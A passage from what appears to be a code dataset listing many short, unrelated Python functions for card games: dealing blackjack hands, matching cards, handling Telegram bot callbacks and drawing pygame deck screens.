self.state[x1, y1]\r\n print('The card you selected: {0}'.format(self.deck[choice1_key]))\r\n\r\n # Repeat this for your second choice\r\n x2, y2 = self.input_validation('Enter the location of the second card you pick (row, col) -> ')\r\n self.selected = [-1, -1] # reset the temporary hold\r\n\r\n choice2_key = self.state[x2, y2]\r\n print('The card you selected: {0}'.format(self.deck[choice2_key]))\r\n\r\n # Check if the two cards are a match or not\r\n if self.check_card(self.deck[choice1_key], self.deck[choice2_key]):\r\n print('MATCH')\r\n # Replace the corresponding cards in the remaining inventory and 
state with -1\r\n self.remaining[choice1_key] = -1\r\n self.remaining[choice2_key] = -1\r\n self.state[x1, y1] = -1\r\n self.state[x2, y2] = -1\r\n self.player_cards += 2 # the player gets 2 cards\r\n self.bin.append([x1, y1]) # move the location of the card to the already-taken bin\r\n self.bin.append([x2, y2])\r\n self.forget_memory(choice1_key) # remove from computer's memory\r\n self.forget_memory(choice2_key)\r\n self.match = 1 # player will continue to choose cards\r\n else:\r\n print('NOT a match')\r\n # Add these cards to the computer's memory\r\n self.computer_memory[choice1_key] = [x1, y1]\r\n self.computer_memory[choice2_key] = [x2, y2]\r\n self.match = 0 # computer's turn\r", "def test_consumed_cards(self):\n game = TestGames.replay(9, [3, 1, 0, 0])\n consumed_cards = game.consumed_cards()\n self.assertEqual(len(consumed_cards), 8)\n\n self.assertListEqual(list(consumed_cards),\n [2 / 5, # guards\n 0 / 2, # priest\n 1 / 2, # baron\n 0 / 2, # handmaid\n 1 / 2, # prince\n 0 / 1, # king\n 0 / 1, # countess\n 0 / 1]) # princess", "def deliver_card(data, access=None):\n\n schema = get_card_schema(data)\n if not schema:\n schema = card_schema\n data = deepcopy(data)\n\n if access is 'learn' and data['kind'] is 'choice':\n if data['order'] == 'random':\n shuffle(data['options'])\n\n if data['max_options_to_show']:\n data['options'] = data['options'][:data['max_options_to_show']]\n\n return deliver_fields(schema, data, access)", "def all_cards_selected(self, game_key):\n participants = models.Participant.query(\n models.Participant.playing == True,\n models.Participant.selected_card == None,\n ancestor=game_key).fetch()\n logging.debug(\"participants who have not selected a card: %s\", participants)\n if participants:\n return False\n else:\n return True", "def draw_a_card(cards):\n import random\n card_drawn = random.choices(card_deck)\n cards.append(card_drawn[0])\n return", "def deal_card():\r\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\r\n return (random.choice(cards))", "def attack(self): # need to check defenders handcount\n \"\"\"Always returns a list of values\"\"\"\n if self.AI:\n # return rand.randint(0,len(self.currentHand))\n Error(\"AI not yet implemented for Attacking\")\n else:\n print(\"Select card from... 
\")\n cardManager.printHand(self.currentHand)\n card = int(input(\"to your attack: \"))\n while card not in self.currentHand: # error checking\n print(\"Please select a valid card from...\", end = \" \")\n cardManager.printHand(self.currentHand)\n card = int(input())\n self.currentHand.remove(card)\n card = self.checkDoubles(card)\n return card", "def test_cards_get(self):\n pass", "def hit(self, deck):\n self.cards.append(deck.draw_card())", "def dealer_card_choice(update, context):\n query = update.callback_query\n if query.message.reply_to_message:\n user = query.message.reply_to_message.from_user\n else:\n user = query.message.chat\n bot = context.bot\n CURRENT_USER = USERS[user.username]\n CURRENT_CONTEXT = process_card_value(query.data, CURRENT_USER)\n message = f'Round: {CURRENT_CONTEXT[\"round\"]} ({CURRENT_CONTEXT[\"username\"]}) \\nDealers Card: {CURRENT_CONTEXT[\"dealer_card\"]}\\nYour Cards: {CURRENT_CONTEXT[\"player_cards\"]} \\nYour total: {CURRENT_CONTEXT[\"player_total\"]} \\n\\nChoose Dealers Card: '\n bot.edit_message_text(\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n text=message,\n reply_markup=card_markup\n )\n\n # Tell ConversationHandler that we're in state `STRATEGY` now\n return STRATEGY", "def get_game_cards(gameId):\n pass", "def indicate_discard_card(whose_turn,players):\n cards_to_choose_from = players[whose_turn].hand.cards\n players[whose_turn].hand.print_cards()\n chosen_to_discard = int(input('Select a card to discard. Type a number. '))\n return chosen_to_discard", "def get_card_sets(self, name: str) -> List:", "def get_card(self, card):\n\n\t\tself.add_card_to_grps(card)\n\n\t\tself.grps = sorted(self.grps, key = lambda x: -len(x))\n\n\n\t\t# check if # of cards forming sets is more than 5; if yes, then break the set to allow computer to form runs\n\t\tnum_set_cards = 0\n\t\tpos = -1\n\t\tfor i in range(len(self.grps)):\n\t\t\tif len(self.grps[i]) > 1 and self.grps[i][0] == self.grps[i][1]:\n\t\t\t\tnum_set_cards += len(self.grps[i])\n\t\t\t\tpos = i\n\n\t\tif num_set_cards > 5:\n\t\t\tcard = self.grps[pos][-1]\n\t\t\tself.grps[pos].remove(card)\n\t\t\tlogger.info(f\"In computer.py/get_card: computer returned {card} to break too many set, computer = {self}\")\n\t\t\treturn card\n\n\n\t\t# if # of sets is fine, then remove a card from the group with least size\n\t\tcard = self.grps[-1][-1]\n\n\t\t\n\t\tif len(self.grps[-1]) == 1:\n\t\t\tself.grps.remove(self.grps[-1])\n\t\telse:\n\t\t\tself.grps[-1].remove(self.grps[-1][-1])\n\n\t\tlogger.info(f\"In computer.py/get_card: computer returned {card}, computer = {self}\")\n\n\t\treturn card", "def cards(\n self,\n cards: Union[List[Tuple[int, str, str]], List[Any]]\n ) -> None:\n self._cards: List[List[Tuple[int, str, str]]] = [cards]", "def deal_card():\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n card = random.choice(cards)\n return card", "def get_cards(self):\n card = self._starting_card\n return card", "def __init__(self, cards = []):\n self.cards=cards", "def receive_card(self, card: Card) -> None:\n\t\tself.deck.append(card)\n\t\t\n\t\t# Sorts the Deck by type and colour for aesthetic purposes\n\t\t\"\"\"self.deck.sort(key=lambda x: repr(x.type))\n\t\tself.deck.sort(key=lambda x: repr(x.colour))\"\"\"", "def choice():\n list_cards = [0, 0, 0, 0, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8, 9, 9,\n 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10]\n list_cards= list_cards*4\n play_1 = 
random.choice(list_cards)\n list_cards_1 = list_cards\n list_cards_1.remove(play_1)\n dealer_1 = random.choice(list_cards_1)\n list_cards_1.remove(dealer_1)\n play_2 = random.choice(list_cards_1)\n list_cards_1.remove(play_2)\n dealer_2 = random.choice(list_cards_1)\n list_cards_1.remove(dealer_2)\n list1=[play_1,play_2]\n list=[dealer_1,dealer_2]\n return (list1,list,list_cards_1)", "def card_selSource(self, **kwargs):\n if \"cardsrc\" in kwargs:\n if kwargs[\"cardsrc\"] == \"hand\":\n selectfrom = self.piles[Piles.HAND]\n elif kwargs[\"cardsrc\"] == \"played\":\n selectfrom = self.piles[Piles.PLAYED]\n elif kwargs[\"cardsrc\"] == \"discard\":\n selectfrom = self.piles[Piles.DISCARD]\n else:\n selectfrom = kwargs[\"cardsrc\"]\n else:\n selectfrom = self.piles[Piles.HAND]\n return selectfrom", "def selectAmbassadorInfluence(self, choices, influenceRemaining):\n # todo: raise notImplemented. should be overriden by the input class\n \n selected = []\n for i in range(influenceRemaining):\n card = random.choice(choices)\n selected.append(card)\n choices.remove(card)\n \n return selected", "def get_cards(query_param):\n return _query_scryfall(query_param)", "def add_card(self, added_cards):\n\n self.hand[:0] = added_cards", "def deal_cards(self):\n aux = random.randint(0, len(self.deck))\n card = self.deck[aux]\n self.deck.pop(aux)\n print(f\"Received: {card}\")\n return card", "def cards(self):\n return self._cards", "def test_cards_get_list(self):\n pass", "def step(self, action):\n assert self.completed_rounds < self.num_rounds\n\n player = self.players[self.current_player_id]\n card = action\n\n if card not in player.hand:\n raise ValueError(\"Action not allowed because the card is not in the player's hand\")\n\n player.hand.remove(card)\n player.played.add(card)\n # print(f\"Player {self.current_player_id} with hand {[c.id for c in player.hand]} played the card {card.id}\")\n best_combination_on_the_table = self._get_best_combination(card)\n if best_combination_on_the_table:\n self.last_player_capturing_id = self.current_player_id\n player.captured.add(card)\n for c in best_combination_on_the_table:\n self.table.remove(c)\n player.captured.add(c)\n if not self.table and not (self._is_last_round and self._is_round_over()):\n player.scope += 1\n else:\n self.table.add(card)\n # print(f\"Cards on the table after play: {[c.id for c in self.table]}\")\n\n if self._is_round_over():\n self.completed_rounds += 1\n # print(f\"=========== Round {self.current_round} completed ============\")\n self.current_player_id = (self.current_player_id + 1) % self.num_players\n\n if self.is_over():\n last_player_capturing = self.players[self.last_player_capturing_id]\n # print(f\"Giving the remaining cards to player {last_player_capturing.player_id}\")\n for card in self.table:\n last_player_capturing.captured.add(card)\n self.table = set()\n assert all([len(p.played) == 10 for p in self.players])\n assert all([len(p.hand) == 0 for p in self.players])\n return self.get_state(), self.current_player_id", "def action_hit(self) -> None:\n print(self.deal_card(self.user))", "def check_selected_card(_player1, _player2):\n if _player1.selected_card and _player2.selected_card:\n color = _player1.selected_card.suit\n if _player2.selected_card.suit != color and check_color_card(_player2, color):\n _player2.selected_card = None", "def collect_cards():\n \n cards_list = []\n while (cards_input := input(\"Enter card: \")) != '#':\n i = cards_input.upper()\n if not is_valid(i):\n print(f\"Please enter a valid card.\")\n 
continue\n cards_list.append(i)\n cards_decoded = [Board.translate(card) for card in cards_list]\n return cards_decoded", "def Send_newCards(self, cards): \n serialized = [c.serialize() for c in cards]\n self.Send({\"action\": \"newCards\", \"cards\": serialized})", "def __init__(self):\n self.cards = [Card(face=card[0], value=card[1], suit=suit)\n for card in CARD_VALUES().items() for suit in CARD_SUITS()]", "def check_card_action(self, card):\n if card.value == \"7\":\n self.seven_punishment()\n elif card.value == \"8\":\n self.eight_punishment()\n elif card.value == \"9\":\n self.nine_punishment()\n elif card.value == \"B\":\n self.jack_wish()", "def hook_buy_this_card(self, game, player):\n totrash = [c for c in player.piles[Piles.PLAYED] if c.isTreasure()]\n for c in totrash:\n player.output(f\"Mint trashing {c.name}\")\n player.trash_card(c)", "def get_card_info_list(self):\n self._get_card_info_list = pa_card_info_cb_t(self._card_info_cb)\n pa_context_get_card_info_list(self._context,\n self._get_card_info_list,\n None)", "def hit(self, deck):\n self.showOneCard = False\n while self.getPoints() < 17:\n self.cards.append(deck.deal())", "def __refresh_search_results(self):\n\n # Define the query\n try:\n query = CardQuery()\n query.max_count = int(self.__box_count.get_text())\n query.max_proficiency = self.__combo_proficiency.get_index()\n query.max_score = float(self.__box_score.get_text())\n if self.__combo_card_type.get_index() > 0:\n query.card_type = getattr(WordType, self.__combo_card_type.get_text())\n except:\n cards = []\n traceback.print_exc()\n else:\n # Query the cards\n cards = []\n for card in self.__cards_source.get_cards():\n study_data = self.__study_database.get_card_study_data(card)\n if query.matches(card, study_data):\n cards.append((card, study_data))\n\n # Sort the list\n sort_method = self.__combo_sort.get_text()\n if sort_method == SortMethod.RANDOM:\n random.shuffle(cards)\n all_cards = list(cards)\n cards = []\n while all_cards and len(cards) < query.max_count:\n index = random.randrange(len(all_cards))\n elem = all_cards[index]\n del all_cards[index] \n cards.append(elem)\n elif sort_method == SortMethod.LOWEST_SCORE:\n cards.sort(key=lambda x: x[1].get_history_score())\n elif sort_method == SortMethod.OLDEST:\n cards.sort(key=lambda x: x[1].get_last_encounter_time() or x[1].get_history_score())\n elif sort_method == SortMethod.NEWEST:\n cards.sort(key=lambda x: x[1].get_last_encounter_time() or x[1].get_history_score(), reverse=True)\n\n cards = cards[:query.max_count]\n\n # Define the study params\n params = StudyParams()\n params.random_side = self.__combo_side.get_index() == 0\n params.random_form = self.__checkbox_random_forms.is_checked()\n params.shown_side = (CardSide.English if self.__combo_side.get_index() == 1\n else CardSide.Russian)\n self.__study_params = params\n\n # Define the scheduler params\n self.__scheduler_params = SchedulerParams(\n max_repetitions=1 if self.__checkbox_only_once.is_checked() else 0)\n \n # Popluate the table\n self.__table_cards.clear()\n for card, study_data in cards:\n color = Config.proficiency_level_colors[study_data.get_proficiency_level()]\n row = self.__table_cards.add(card, color=color)\n cards = [card for card, _ in cards]\n\n self.__cards = cards\n self.__button_begin.set_enabled(len(cards) > 0 and self.__study_params)\n self.__label_result_count.set_text(\"{} Results\".format(len(self.__cards)))", "def hit(\n self,\n card: List[Tuple[int, str, str]],\n card_index: int = 0\n ) -> None:\n 
self._cards[card_index].extend(card)", "def refresh(self):\n self.deck = []\n\n for _suit in Suit:\n for _face in Face:\n self.insert(Card(_suit, _face, self))", "def _cards_getter(self):\n pass", "def add_cards(self, cards):\n self.get_cards().extend(cards)", "async def get_available_cards(self, game_id): # pass in a list of card ids\n all_cards = await self.get_all_cards()\n available_cards = []\n game = await self.get_game(game_id)\n player1_cards = await self.get_current_cards(game[1])\n player2_cards = await self.get_current_cards(game[2])\n for card in all_cards:\n if card not in player1_cards and card not in player2_cards:\n available_cards.append(card)\n return available_cards", "def draw_card(self, card):\n self.current_hand.append(card)", "def get_selected_card(self, pos, double_clicking=False):\n if self.selectable:\n double_select = False\n relative_pos_x = pos[0] - self.x\n relative_pos_y = pos[1] - self.y\n mouse_pos = (relative_pos_x, relative_pos_y)\n self.selected_card = -1\n if not self.draw_from_last:\n for i, card in enumerate(reversed(self.cards)):\n if card.rect.collidepoint(mouse_pos):\n self.selected_card = len(self.cards) - 1 - i\n break\n else:\n for i, card in enumerate(self.cards):\n if card.rect.collidepoint(mouse_pos):\n self.selected_card = i\n break\n\n if self.prev_selected[-1] == self.selected_card:\n if not double_clicking:\n self.selected_card = -1\n\n self.record_selected_history()\n self.update_deck_display()\n\n selected_history = [sel for sel in self.prev_selected if sel >= 0]\n\n return (len(selected_history) == 2 and self.prev_selected.count(self.selected_card) == 2\n and self.selected_card >= 0) and double_clicking\n return False", "def deal_card():\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n random_card = random.choice(cards)\n return random_card", "def select_card(player, _mouse_x=None, _mouse_y=None):\n if _mouse_x:\n for card in player.cards:\n lower_x = card.positionx\n lower_y = card.positiony\n if lower_x < _mouse_x < lower_x + 100 and lower_y < _mouse_y < lower_y + 100:\n player.selected_card = card", "def receive_chance_card(self, card):\r\n self.chance_cards.append(card)", "def build_deck_screen_my_deck_card_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n # Draw the character card\n if user.character_card == '':\n pass\n else:\n user.character_card.rect.x = 65\n user.character_card.rect.y = 600\n screen.blit(user.character_card.image, user.character_card.rect)\n #Clear duplicate amount each frame and render the refined list\n for card_new in user.deck_list:\n card_new.duplicate = 1\n local_store_list = build_deck_screen_my_deck_card_list_refine(user)\n #use refined list to draw\n rect_position_x = 245 #local variables for rect position for the first card in the user deck\n rect_position_y = 600\n row_number = 1\n #Display cards in local_store_list:\n\n if screen_status.build_deck_screen_my_deck_page_id <= 0:\n screen_status.build_deck_screen_my_deck_page_id = 1\n # Edge cases when len() = 6,12,18....\n if len(local_store_list) % 6 == 0 and len(local_store_list) != 0:\n if screen_status.build_deck_screen_my_deck_page_id >= (len(local_store_list))//6 + 1:\n screen_status.build_deck_screen_my_deck_page_id = (len(local_store_list))//6 + 0\n\n else:\n if screen_status.build_deck_screen_my_deck_page_id >= (len(local_store_list))//6 + 2:\n screen_status.build_deck_screen_my_deck_page_id = (len(local_store_list))//6 + 1\n # Algorithm to draw all cards in local_store_list, 6 card per page.\n for 
card in local_store_list[6*(screen_status.build_deck_screen_my_deck_page_id - 1):6 * screen_status.build_deck_screen_my_deck_page_id]:\n if row_number <= 6:\n card.rect.x = rect_position_x\n card.rect.y = rect_position_y\n screen.blit(card.image, card.rect)\n rect_position_x += 145\n row_number += 1\n build_deck_screen_my_deck_duplicate_number_display(card, screen)\n if row_number >= 7:\n row_number = 1", "def deal_cards(self):\n self.card = random.randint(1, 13)\n return self.card", "def deal_opening_cards(self) -> None:\r\n for i in range(self.num_of_players):\r\n self.dealer.deal_cards_to(self.players[i].cards_stack, PokerRules.CARDS_PER_PLAYER)", "def cards_to_deal(cls, context={}):\n\t\traise NotImplementedError()", "def cards():\n if user_loggined():\n user = models.User.query.get(session['user_id'])\n u_cards = user.cards.all()\n prep_cards = []\n for card in u_cards:\n prep_cards.append(card.type + ' **** '+card.cnb[-9:])\n else:\n return redirect(url_for('index'))\n return redirect(url_for('index'))", "def take(self, table):\n # take card\n self.hand.add(table.card)\n table.card = table.cards.pop()\n # take chips\n self.chips += table.chips\n table.chips = 0", "def receive_card(self, card, new_suite=None, is_using_chameleon=False):\n assert isinstance(card, tuple)\n assert len(card) == 2\n\n if card.value == 14 or card.value == self.chameleon and is_using_chameleon:\n assert new_suite != None, print('You must specify a new suite.')\n assert new_suite in ['hearts', 'spades', 'diamonds', 'clubs']\n\n self.current_suite = new_suite\n self.current_value = None\n\n else:\n self.cards.append(card)\n self.current_suite = card.suite\n self.current_value = card.value", "def card_output():\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n return random.choice(cards)", "def initial_draw(self):\n self.player.take_card(self.deck)\n self.dealer.take_card(self.deck)\n self.player.take_card(self.deck)\n self.dealer.put_face_down(self.deck)", "def get_options(cls, player, context={}):\n\t\toptions = []\n\t\tfor card in player.hand:\n\t\t\tif cls.can_be_played(card, context):\n\t\t\t\toptions.extend(card.actions)\n\t\toptions.append(Action(None, \"DRAW\", [DrawCard]))\n\t\treturn options", "def check_cards_eligibility(self):\n for c in self.hand:\n c.check_actions(self)\n for c in self.phand:\n c.check_actions(self)\n for c in self.discard:\n c.check_actions(self)\n for c in self.active_player.phand:\n c.check_actions(self)\n for c in self.active_player.hand:\n c.check_actions(self)\n for c in self.active_player.discard:\n c.check_actions(self)\n for c in self.played_user_cards:\n c.check_actions(self)\n if ACTION_KEEP in self.actions:\n for p in self.players:\n for c in p.phand:\n c.check_actions(self)\n for c in p.hand:\n c.check_actions(self)\n for c in p.discard:\n c.check_actions(self)", "def get_hand(self):\n return self.cards", "def get_cards(self):\n return deepcopy(self._cards)", "def lobby_screen_pick_deck_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n # Pick deck text\n button_text_1 = Button('Pick an exist deck or create a new one: ','', (250,250,250),400, 100, 400, 35, font_color = (0,0,0), alpha = 150)\n button_text_1.update()\n button_text_1.draw(screen)\n\n # Deck list buttons\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n if len(f.readlines()) >= 12:\n pass\n else:\n button_new_deck = Button('+ New Deck','', (250,250,250),1020, 110, 120, 35, font_color = (0,0,0), alpha = 150)\n 
button_new_deck.update()\n button_new_deck.draw(screen)\n\n\n f.seek(0)\n x = len(f.readlines())\n y = 0\n deck_list_index = 0\n\n for i in range(1,7):\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) not in line:\n y += 1\n if y < x: # DECK_LIST_i exist\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n deck_length = len(make_card_list_from_string(line.replace('DECK_LIST_' + str(i) + ' = ', ''), ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2))\n # deck_length = int((len(line.replace('DECK_LIST_' + str(i) + ' = ', '')) -1)/14)\n if 'CHARACTER_' + str(i) in line:\n character_length = 1\n character_card = eval('card_' + line.replace('CHARACTER_' + str(i) + ' = ', '')[7:12])\n\n if user.deck_list_index == str(i):\n\n button_top = Button(character_card.name + ': ','', (100,30,130),85 + 180* (i-1), 165, 130, 60)\n button_top.update()\n button_top.draw(screen)\n\n if deck_length < 40:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (100,30,130),85 + 180* (i-1), 225, 130, 50, font_color = (250,0,0))\n button_bottom.update()\n button_bottom.draw(screen)\n else:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (100,30,130),85 + 180* (i-1), 225, 130, 50)\n button_bottom.update()\n button_bottom.draw(screen)\n\n else:\n\n button_top = Button(character_card.name + ': ','', (160,160,160),85 + 180* (i-1), 165, 130, 60, alpha = 240)\n button_top.update()\n button_top.draw(screen)\n\n if deck_length < 40:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (160,160,160),85 + 180* (i-1), 225, 130, 50, font_color = (200,0,0), alpha = 240)\n button_bottom.update()\n button_bottom.draw(screen)\n else:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (160,160,160),85 + 180* (i-1), 225, 130, 50, alpha = 240)\n button_bottom.update()\n button_bottom.draw(screen)\n\n y = 0\n\n else: # DECK_LIST_i not exist\n\n button = Button('Empty','', (200,200,200),85 + 180* (i-1), 165, 130, 110, alpha = 80)\n button.update()\n button.draw(screen)\n\n y = 0\n\n\n for i in range(1,7):\n if user.deck_list_index == str(i):\n button_edit = Button('Edit','', (50,50,170),85 + 180* (i-1), 282, 60, 30)\n button_edit.update()\n button_edit.draw(screen)\n\n button_delete = Button('Delete','', (160,30,30), 155 + 180* (i-1), 282, 60, 30)\n button_delete.update()\n button_delete.draw(screen)", "def hit(hand=bj.player1.hand):\r\n hand.append(bj.deck.remove_card())", "def test_play_card(self):\n self.plr.piles[Piles.DECK].set(\"Silver\", \"Province\", \"Moat\", \"Gold\")\n self.vic.piles[Piles.DECK].set(\"Duchy\")\n self.plr.test_input = [\"discard\", \"discard\", \"putback\"]\n self.plr.play_card(self.card)\n self.g.print_state()\n self.assertEqual(self.plr.actions.get(), 1)\n self.assertIn(\"Duchy\", self.vic.piles[Piles.DISCARD])\n self.assertIn(\"Gold\", self.plr.piles[Piles.DISCARD])\n self.assertIn(\"Province\", self.plr.piles[Piles.HAND])\n self.assertIn(\"Moat\", self.plr.piles[Piles.HAND])\n self.assertIn(\"Silver\", self.plr.piles[Piles.DECK])", "def hit(self, deck):\n try:\n self.hand.append(deck.pop(0))\n except IndexError:\n print('There are no more cards in the deck!')", "def get_cards(self):\n return [card.view_model() for card in self._deck.loc]", "def deal(self, cards_num):\n\n cards = []\n while cards_num > 0:\n\n x = random.randint(0, 53)\n if self.in_use[x] == 0:\n self.in_use[x] += 1\n cards.append(x)\n 
cards_num -= 1\n\n return cards", "def player_card_one_choice(update, context):\n query = update.callback_query\n if query.message.reply_to_message:\n user = query.message.reply_to_message.from_user\n else:\n user = query.message.chat\n bot = context.bot\n CURRENT_CONTEXT = USERS[user.username]\n message = f'Round: {CURRENT_CONTEXT[\"round\"]} ({CURRENT_CONTEXT[\"username\"]}) \\nDealers Card: {CURRENT_CONTEXT[\"dealer_card\"]}\\nYour Cards: {CURRENT_CONTEXT[\"player_cards\"]} \\nYour total: {CURRENT_CONTEXT[\"player_total\"]} \\n\\nChoose Your 1st Card: '\n bot.edit_message_text(\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n text=message,\n reply_markup=card_markup\n )\n\n return PLAYER_CARD_TWO", "def main():\n\n # call to OS for positioning window\n os.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (0, 25)\n\n # Initialization block\n pygame.init() # Initialize pygame module\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT)) # initialize screen\n\n # Testing\n # model_card = m_card.Card(m_card.CardType.TEMPURA)\n # view_card = v_card.CardView(screen, model_card)\n\n deck = Deck()\n player = Player()\n b_pack = deck.generate_booster(10)\n player.booster_pack = b_pack\n\n hand_view = HandView(screen, (0, SCREEN_HEIGHT - SCREEN_HEIGHT / 5), (SCREEN_WIDTH, SCREEN_HEIGHT / 5), player)\n pick_crds = PickedCardsView(screen, (0, 0), (SCREEN_WIDTH, SCREEN_HEIGHT / 5), player, 0)\n pick_crds2 = PickedCardsView(screen, (0, 0), (SCREEN_WIDTH, SCREEN_HEIGHT / 5), player, 180)\n # Game loop\n while True:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONUP:\n is_clicked([hand_view, pick_crds, pick_crds2], pygame.mouse.get_pos())\n screen.fill((0, 0, 0))\n hand_view.draw()\n pick_crds.draw()\n pick_crds2.draw()\n pygame.display.flip()", "def battle_screen_my_hand_card_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n rect_position_x = 100\n rect_position_y = 610\n row_number = 1\n if screen_status.battle_screen_action_indicator == 'stage-0':\n pass\n else :\n\n if screen_status.battle_screen_my_hand_page_id <= 0:\n screen_status.battle_screen_my_hand_page_id = 1\n # Edge cases when len() = 6,12,18....\n if len(user.hand_list) % 7 == 0 and len(user.hand_list) != 0:\n if screen_status.battle_screen_my_hand_page_id >= (len(user.hand_list))//7 + 1:\n screen_status.battle_screen_my_hand_page_id = (len(user.hand_list))//7 + 0\n\n else:\n if screen_status.battle_screen_my_hand_page_id >= (len(user.hand_list))//7 + 2:\n screen_status.battle_screen_my_hand_page_id = (len(user.hand_list))//7 + 1\n # Algorithm to draw all cards in local_store_list, 6 card per page.\n for card in user.hand_list[7*(screen_status.battle_screen_my_hand_page_id - 1):7 * screen_status.battle_screen_my_hand_page_id]:\n if row_number <= 7:\n card.rect.x = rect_position_x\n card.rect.y = rect_position_y\n screen.blit(card.image, card.rect)\n rect_position_x += 145\n row_number += 1\n if row_number >= 8:\n row_number = 1", "def dealCards(deck, player, numCards):\n print \"dealing %s cards to %s...\" % (numCards, player.name)\n for card in range(numCards):\n card = deck[0]\n deck.pop(0)\n player.cards.append(card)\n print \"added %s card for %s\" % (card, player.name)\n print player.cards", "def setup_cards(self, server):\r\n\t\tversions_list = self.ice.getVersionsList()\r\n\t\talarm_list = self.ice.getAlarmStatus()\r\n\t\tstatus_list = self.ice.getStatus()\r\n\t\twarning_list = 
self.ice.getWarnings()\r\n\r\n\t\tdateTimeObj = datetime.now()\r\n\t\ttimestampStr = dateTimeObj.strftime(\"%d-%b-%Y (%H:%M:%S)\")\r\n\t\tcards = self.ice.getCardsAlive()\r\n\t\tfor i in range(len(versions_list)):\r\n\t\t\tjson_body = versions_list[i]\r\n\t\t\tjson_body.update({'alarm':alarm_list[i],'status':status_list[i], 'card':cards[i], 'warning':warning_list[i],'update':timestampStr, 'hostname':self.ip})\r\n\t\t\tserver.index(index='icepap_info', id=self.ip + '_' + str(cards[i]), body=json_body)", "def getAllCards(self):\n return self._cards", "def build_deck_screen_card_gallery_card_display(screen, buttons, screen_status, button_status, card_database_filter):\n rect_position_x = 100 #local variables for rect position for the first card in the card gallery\n rect_position_y = 130\n row_number = 1 # local variable to help keep track of position of card\n # Check the page number to make sure if will not go negative or randomly large\n if screen_status.build_deck_screen_card_gallery_page_id <= 0:\n screen_status.build_deck_screen_card_gallery_page_id = 1\n # Edge cases when len() = 14, 28, 42...\n if len(cdf.request_card_list(card_database_filter)) % 14 == 0 and len(cdf.request_card_list(card_database_filter)) != 0:\n if screen_status.build_deck_screen_card_gallery_page_id >= (len(cdf.request_card_list(card_database_filter)))//14 + 1:\n screen_status.build_deck_screen_card_gallery_page_id = (len(cdf.request_card_list(card_database_filter)))//14 + 0\n\n else:\n if screen_status.build_deck_screen_card_gallery_page_id >= (len(cdf.request_card_list(card_database_filter)))//14 + 2:\n screen_status.build_deck_screen_card_gallery_page_id = (len(cdf.request_card_list(card_database_filter)))//14 + 1\n # Algorithm to draw all cards in request_card_list, 14 card per page.\n for card in cdf.request_card_list(card_database_filter)[14*(screen_status.build_deck_screen_card_gallery_page_id - 1):14 * screen_status.build_deck_screen_card_gallery_page_id]:\n if row_number <= 7:\n card.rect.x = rect_position_x\n card.rect.y = rect_position_y\n screen.blit(card.image, card.rect)\n rect_position_x += 145\n row_number += 1\n elif row_number <= 14:\n card.rect.x = rect_position_x - 1015\n card.rect.y = rect_position_y + 200\n screen.blit(card.image, card.rect)\n rect_position_x += 145\n row_number += 1\n if row_number >= 15:\n row_number = 1", "def setup_newgame(self):\n global chips\n self.bet = 100\n if chips < self.bet: \n self.game_over = True\n chips -= self.bet\n \n\n self.cards_list = arcade.SpriteList()\n\n #resets on newgame\n self.top_card_int = 0 ## this had to be moved here to make it so that you are not drawing over the 52 card limit\n self.player_hand = []\n self.dealer_hand = []\n self.player_value = 0\n self.dealer_value = 0\n self.player_ace_count = 0\n self.dealer_ace_count = 0\n self.player_almost_bust = 0\n self.dealer_almost_bust = 0\n self.blackjack = False\n self.victory = False\n self.defeat = False\n \n #creates deck\n for card_suit in CARD_SUITS:\n for card_value in CARD_VALUES:\n card = Card(card_suit, card_value, CARD_SCALE)\n self.cards_list.append(card)\n #shuffles deck\n for pos1 in range(len(self.cards_list)):\n pos2 = random.randrange(len(self.cards_list))\n self.cards_list.swap(pos1, pos2)\n \n #Current way to add cards to player and dealer hands since using .pop() on self.cards_list deletes the card itself even in the other hands\n \n #self.dealer_hand.append(self.top_card_int)\n self.hit(\"dealer\")\n self.dealer_hand[0].face_down()\n #first_card = self.dealer_hand[0]\n 
#first_card.face_down()\n #self.dealer_hand[0].face_down()\n self.hit(\"player\")\n self.player_hand[0].face_down()\n self.hit(\"dealer\")\n self.dealer_hand[1].face_down()\n self.hit(\"player\")\n self.player_hand[1].face_down()\n self.update_card_positions()" ]
